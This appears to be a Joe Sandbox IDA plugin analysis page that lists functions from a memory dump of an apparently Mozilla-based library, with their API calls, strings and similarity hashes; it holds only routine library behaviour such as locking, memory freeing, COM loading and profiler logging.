Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: d64b4f8f8713c2d5fdf95df56e1a4f8f349acbdeae429086348c2d8290bedbcf
Instruction ID: 427c905442050544f6d33fe171fdfb4976d3a4ae58283fdf32db7e0270bf26a9
Opcode Fuzzy Hash: d64b4f8f8713c2d5fdf95df56e1a4f8f349acbdeae429086348c2d8290bedbcf
Instruction Fuzzy Hash: BB41F671B043159BCF24DEBCEC8099FBBEAEF85224B144638E869D7381DB349944C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BABAAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BADE220,?), ref: 6BABBC2D
ReleaseSRWLockExclusive.KERNEL32(6BADE220), ref: 6BABBC42
RtlFreeHeap.NTDLL(?,00000000,6BACE300), ref: 6BABBC82
RtlFreeUnicodeString.NTDLL(6BADE210), ref: 6BABBC91
RtlFreeUnicodeString.NTDLL(6BADE208), ref: 6BABBCA3
RtlFreeHeap.NTDLL(?,00000000,6BADE21C), ref: 6BABBCD2
free.MOZGLUE(?), ref: 6BABBCD8

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: b27edcb0d648037ec5c280cf8bfc3ebdcaf949d0b339b0823c5ceab82fe50fb2
Instruction ID: f6cb54e8212160e15a54d9ff09dac49e4191efd2670e7bd62a29be5d88228ec2
Opcode Fuzzy Hash: b27edcb0d648037ec5c280cf8bfc3ebdcaf949d0b339b0823c5ceab82fe50fb2
Instruction Fuzzy Hash: 1121B1725003049FEB20CF16C8C0B66B7ADFF4A614F44856DE4695B610CB79F881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA638A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BADE220,?,?,?,?,6BA63899,?), ref: 6BA638B2
ReleaseSRWLockExclusive.KERNEL32(6BADE220,?,?,?,6BA63899,?), ref: 6BA638C3
free.MOZGLUE(00000000,?,?,?,6BA63899,?), ref: 6BA638F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6BA63920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6BA63899,?), ref: 6BA6392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6BA63899,?), ref: 6BA63943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6BA6396E

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 2b723a26c9d0f1d67eb312bb60d1302e3f85d54a17f814879d57727d1f3f4e77
Instruction ID: fb1a73abda743c43fb9db7068412ef3280ed5c7c769fd1d3022a1d3063ceb20c
Opcode Fuzzy Hash: 2b723a26c9d0f1d67eb312bb60d1302e3f85d54a17f814879d57727d1f3f4e77
Instruction Fuzzy Hash: AA21B1B26007109FDB209F29C880B8AB7E5EF45764F158469D99A97650E738E882CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAAD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD1F5

Part of subcall function 6BAAAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6BAAAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD211
GetCurrentThreadId.KERNEL32 ref: 6BAAD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD279
free.MOZGLUE(?), ref: 6BAAD2B2

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 1ed024c6c384e0050777d739799c5b395167d412514335570c0a2df6d43499de
Instruction ID: 8f9e52c9a3ce00ac56a0897b4a25104a3f0e2d1960b146f0a511b45a7741376c
Opcode Fuzzy Hash: 1ed024c6c384e0050777d739799c5b395167d412514335570c0a2df6d43499de
Instruction Fuzzy Hash: EC218075608305EFCF04DF24C498A9EB7A1FF8A324F50462EE95687340DB35E94ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 6BA62070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1

LoadLibraryW.KERNEL32(combase.dll,6BA61C5F), ref: 6BA620AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BA620CD
__Init_thread_footer.LIBCMT ref: 6BA620E1
FreeLibrary.KERNEL32 ref: 6BA62124

Strings

combase.dll, xrefs: 6BA620A9
CoInitializeSecurity, xrefs: 6BA620C7

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 24ce58c1708c1b3677b76a36fe332257a62d3998debb4e42281dc21f03d325d2
Instruction ID: 76e220574412601aadc017960dc7aca267245d3b76c7e16440e55226c746e9a3
Opcode Fuzzy Hash: 24ce58c1708c1b3677b76a36fe332257a62d3998debb4e42281dc21f03d325d2
Instruction Fuzzy Hash: 40212876408309AFDF118F94DC48D9B3BB6FB8A365F048119FE1592250DB36D8A2DF61

Uniqueness

Uniqueness Score: -1.00%

Function 6BA999A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA999C1
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999CE
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999F8
GetCurrentThreadId.KERNEL32 ref: 6BA99A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA99A0D

Part of subcall function 6BA99A60: GetCurrentThreadId.KERNEL32 ref: 6BA99A95
Part of subcall function 6BA99A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA99A9D
Part of subcall function 6BA99A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA99ACC
Part of subcall function 6BA99A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA99BA7
Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BA99BB8
Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BA99BC9

Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6BA99A15

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: d1f4e12849da6a3ff57bb00d3385d97ce3172a48568ac11b9d26f442486a5f7f
Instruction ID: 7b7e86dcedbffe4a79230a47e79459aeb709a7bf4624e5d940148e13a675c74b
Opcode Fuzzy Hash: d1f4e12849da6a3ff57bb00d3385d97ce3172a48568ac11b9d26f442486a5f7f
Instruction Fuzzy Hash: 1201087581C224AFDF106F24A90876A37B4EBC6654F04811AED4553302CB3DC882D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA61FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6BA61FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6BA61FFD
__Init_thread_footer.LIBCMT ref: 6BA62011
FreeLibrary.KERNEL32 ref: 6BA62059

Strings

combase.dll, xrefs: 6BA61FD9
CoCreateInstance, xrefs: 6BA61FF7

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: d2c29da6c671afbebda91e00e1878da15e4d5fe187d5036c9d430a6485829404
Instruction ID: 2a496bdbf72b4d5439d35e77d0670949ba7266ec4af115ffa36c055ed5fb7c24
Opcode Fuzzy Hash: d2c29da6c671afbebda91e00e1878da15e4d5fe187d5036c9d430a6485829404
Instruction Fuzzy Hash: 0D1179B4548304BFEF208F64C849E9B3B79FB8A395F00C02DE90582280DB36D982DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6BA662E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6BA6631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6BA6633A
__Init_thread_footer.LIBCMT ref: 6BA6634E
FreeLibrary.KERNEL32 ref: 6BA66376

Strings

CoUninitialize, xrefs: 6BA66334
combase.dll, xrefs: 6BA66316

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 818a5d45611cfa253ee0d3939c522a8aae1e3f2f34ec004c9f578142463f98cb
Instruction ID: dbc13991353d699ec36c45b0da2594f1348f733bf6e788891a196cbd0d219d7f
Opcode Fuzzy Hash: 818a5d45611cfa253ee0d3939c522a8aae1e3f2f34ec004c9f578142463f98cb
Instruction Fuzzy Hash: 1A0148B4408301CFEF008F28D558B9677B1B78A355F08826DDE01C2380EB7AE483CE55

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA9BAE
free.MOZGLUE(?,?), ref: 6BAA9BC3
free.MOZGLUE(?,?), ref: 6BAA9BD9

Part of subcall function 6BAA93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA94C8
Part of subcall function 6BAA93B0: free.MOZGLUE(6BAA9281,?), ref: 6BAA94DD

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 217247cd00dbececb857a20846198d99a87df03d5b18f73c8013b27fac4e0c98
Instruction ID: cbdcb28df9d9637c0793816ed6a47a3b7093025ce3eea6675c7b01a3d4e2685e
Opcode Fuzzy Hash: 217247cd00dbececb857a20846198d99a87df03d5b18f73c8013b27fac4e0c98
Instruction Fuzzy Hash: 02B1AF75A04B058BCF01CF68C58055FF3F5FFC9324B148669E859AB241DB36E986CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA971A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6BA96060: moz_xmalloc.MOZGLUE(00000024,02BBF361,00000000,?,00000000,?,?,6BA95FCB,6BA979A3), ref: 6BA96078

free.MOZGLUE(-00000001), ref: 6BA972F6
free.MOZGLUE(?), ref: 6BA97311

Strings

333s, xrefs: 6BA97226
Spliced unique strings, xrefs: 6BA97340
Copied unique strings, xrefs: 6BA97320
333s, xrefs: 6BA9731B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 95b462b498255f9cbe75177c250e2e541ede2d2e1c726c8cd13eb1d23f7244d9
Instruction ID: b14b07b316fbfd4062759c959f65e67d3848916d7317b4f090d7099fabbc06f1
Opcode Fuzzy Hash: 95b462b498255f9cbe75177c250e2e541ede2d2e1c726c8cd13eb1d23f7244d9
Instruction Fuzzy Hash: 1771A871F102158FDF14DF69D9906AEB7F2BF84304F29812DD819AB310DB39A986CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BAAC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BAAC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6BAAC29E

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: ac61df89897ac00736d4e04c0be80af44986d419e7399ac36450f7c3c6f0c833
Instruction ID: 798913d4610daf57b2dc652be2d17ec747f6102a48db647ee8ed39a2ed0c5a8e
Opcode Fuzzy Hash: ac61df89897ac00736d4e04c0be80af44986d419e7399ac36450f7c3c6f0c833
Instruction Fuzzy Hash: 1861BD71A04214DFDF14CFACD88059EBBB5EF49310F19456AE812A7250E735A989CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6BA9CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA9CA69
Sleep.KERNEL32 ref: 6BA9CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA9CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BA9CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6BA9CB19

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: a8174f3d3883fa43b1d339e949c75fe0d7d8698f9e507144f4d3bcf66a12c178
Instruction ID: b672139e4c211adc196c24e030f83d9d445cb4efa5a12ff80113a223c3556227
Opcode Fuzzy Hash: a8174f3d3883fa43b1d339e949c75fe0d7d8698f9e507144f4d3bcf66a12c178
Instruction Fuzzy Hash: 1421F331A58B488BCB09AB38984556BB7BAFFC6305F408629E855A7180FF78D9C58781

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6BAAC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6BAAC842

Part of subcall function 6BAACAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6BACB5EB,00000000), ref: 6BAACB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6BAAC863
std::_Facet_Register.LIBCPMT ref: 6BAAC875

Part of subcall function 6BA8B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6BACB636,?), ref: 6BA8B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6BAAC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAAC8BC

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: d0705039aa7f865854f793aa2932ec26f0888c269744f626f6661787f1107723
Instruction ID: 4ae44312889c4f70e1d384a2b1a67589bed1f297bdbd516d2d7f300461b04011
Opcode Fuzzy Hash: d0705039aa7f865854f793aa2932ec26f0888c269744f626f6661787f1107723
Instruction Fuzzy Hash: F7119071A043099BDF00DFA4C8898AEBBB5FF89310F404129E50697381EB35D946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5EB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 6BA5EBB5

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BA8D7F3), ref: 6BA5EBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EBD6
free.MOZGLUE(?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EC0E

Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6BA8D7F3), ref: 6BA5EC1A

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: cd094e08774c8e69d2a17e12e45816bf273c7f7f952c51de8e608af4bf55d455
Instruction ID: 19bd5a61e8b0305b6de4ac309e8d987376747f971bb58ad6fc344d0d3324c4d8
Opcode Fuzzy Hash: cd094e08774c8e69d2a17e12e45816bf273c7f7f952c51de8e608af4bf55d455
Instruction Fuzzy Hash: A51129F2E043545BEF008B789D4576F3AA89B41719F054434E845DB340E379CE9087E3

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BAA0270
GetCurrentThreadId.KERNEL32 ref: 6BAA02E9
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA02F6
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA033A

Strings

about:blank, xrefs: 6BAA020F

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

